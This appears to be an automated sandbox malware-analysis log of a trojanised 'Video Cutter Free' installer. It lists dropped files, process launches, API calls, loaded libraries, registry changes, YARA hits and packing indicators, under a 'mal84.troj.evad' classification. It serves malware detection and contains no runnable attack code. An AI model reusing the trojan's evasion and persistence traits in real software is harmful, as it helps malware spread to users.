                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 00457B60 appears 97 times
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 00453344 appears 94 times
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 004460A4 appears 59 times
                    Source: imMQqf6YWk.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: imMQqf6YWk.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: imMQqf6YWk.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: imMQqf6YWk.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-LRS1N.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-LRS1N.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-LRS1N.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.5.drStatic PE information: Number of sections : 19 > 10
                    Source: is-PTGV1.tmp.1.drStatic PE information: Number of sections : 19 > 10
                    Source: imMQqf6YWk.exe, 00000000.00000003.2012312615.0000000002158000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs imMQqf6YWk.exe
                    Source: imMQqf6YWk.exe, 00000000.00000003.2012131202.0000000002380000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs imMQqf6YWk.exe
                    Source: imMQqf6YWk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: videocutterfree.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: DVCMediaPlugin.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal84.troj.evad.winEXE@10/30@0/2
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_0099F670 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,5_2_0099F670
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455E0C
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: CloseServiceHandle,CreateServiceA,CloseServiceHandle,5_2_004028D6
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0046DF58 GetVersion,CoCreateInstance,1_2_0046DF58
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_00402520 StartServiceCtrlDispatcherA,5_2_00402520
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_00402520 StartServiceCtrlDispatcherA,5_2_00402520
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeFile created: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmpJump to behavior
                    Source: Yara matchFile source: 5.0.videocutterfree.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.2025991381.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.3874521806.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-E132I.tmp, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: videocutterfree.exe, videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: videocutterfree.exe, videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: videocutterfree.exe, videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: imMQqf6YWk.exeReversingLabs: Detection: 23%
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeFile read: C:\Users\user\Desktop\imMQqf6YWk.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\imMQqf6YWk.exe "C:\Users\user\Desktop\imMQqf6YWk.exe"
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeProcess created: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp "C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp" /SL5="$2042A,3667024,54272,C:\Users\user\Desktop\imMQqf6YWk.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause video_cutter_free_12102
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe "C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe" -i
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause video_cutter_free_12102
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeProcess created: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp "C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp" /SL5="$2042A,3667024,54272,C:\Users\user\Desktop\imMQqf6YWk.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause video_cutter_free_12102Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpProcess created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe "C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe" -iJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause video_cutter_free_12102Jump to behavior
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Video Cutter Free_is1Jump to behavior
                    Source: imMQqf6YWk.exeStatic file information: File size 3915755 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-LDIKA.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-2IP8E.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-LDIKA.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-IBF1C.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-2IP8E.tmp.1.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeUnpacked PE file: 5.2.videocutterfree.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.adtt3:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeUnpacked PE file: 5.2.videocutterfree.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: videocutterfree.exe.1.drStatic PE information: section name: .adtt3
                    Source: is-PTGV1.tmp.1.drStatic PE information: section name: /4
                    Source: is-PTGV1.tmp.1.drStatic PE information: section name: /19
                    Source: is-PTGV1.tmp.1.drStatic PE information: section name: /35
                    Source: is-PTGV1.tmp.1.drStatic PE information: section name: /51
                    Source: is-PTGV1.tmp.1.drStatic PE information: section name: /63
                    Source: is-PTGV1.tmp.1.drStatic PE information: section name: /77
                    Source: is-PTGV1.tmp.1.drStatic PE information: section name: /89
                    Source: is-PTGV1.tmp.1.drStatic PE information: section name: /102
                    Source: is-PTGV1.tmp.1.drStatic PE information: section name: /113
                    Source: is-PTGV1.tmp.1.drStatic PE information: section name: /124
                    Source: is-IBF1C.tmp.1.drStatic PE information: section name: Shared
                    Source: DVCMediaPlugin.exe.5.drStatic PE information: section name: .adtt3
                    Source: sqlite3.dll.5.drStatic PE information: section name: /4
                    Source: sqlite3.dll.5.drStatic PE information: section name: /19
                    Source: sqlite3.dll.5.drStatic PE information: section name: /35
                    Source: sqlite3.dll.5.drStatic PE information: section name: /51
                    Source: sqlite3.dll.5.drStatic PE information: section name: /63
                    Source: sqlite3.dll.5.drStatic PE information: section name: /77
                    Source: sqlite3.dll.5.drStatic PE information: section name: /89
                    Source: sqlite3.dll.5.drStatic PE information: section name: /102
                    Source: sqlite3.dll.5.drStatic PE information: section name: /113
                    Source: sqlite3.dll.5.drStatic PE information: section name: /124
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0040994C push 00409989h; ret 1_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00483A6C push 00483B7Ah; ret 1_2_00483B72
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx1_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0049481C push ecx; mov dword ptr [esp], ecx1_2_00494821
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx1_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0048515C push ecx; mov dword ptr [esp], ecx1_2_00485161
